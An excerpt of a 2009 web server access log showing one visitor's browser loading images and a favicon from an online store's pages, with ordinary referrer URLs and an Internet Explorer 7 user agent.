88.246.245.86 - - [28/Jul/2009:03:13:45 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:46 -0400] "GET /images/items/CALCIUMSULFATE_THUMB.JPG HTTP/1.1" 200 2715 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:46 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:49 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:49 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:51 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:51 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:51 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
